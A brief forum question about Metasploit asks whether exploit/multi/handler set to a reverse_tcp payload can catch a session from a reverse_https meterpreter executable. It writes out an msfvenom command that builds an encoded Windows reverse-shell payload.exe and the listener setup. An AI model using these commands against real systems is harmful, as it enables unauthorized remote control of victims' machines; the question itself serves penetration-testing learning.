specific metasploit question about handler


Can the handler exploit/multi/handler handle a connection from another type of payload ?
payload generation : msfvenom LHOST=”IP” LPORT=”PORT” -f exe -e x86/shikata_ga_nai -p windows/meterpreter_reverse_https -o payload.exe listener : msfconsole; use exploit/multi/handler, set payload windows/meterpreter_reverse_tcp, set LHOST , set LPORT , exploit when the target launch the “payload.exe”, a session will open in the attacker console ?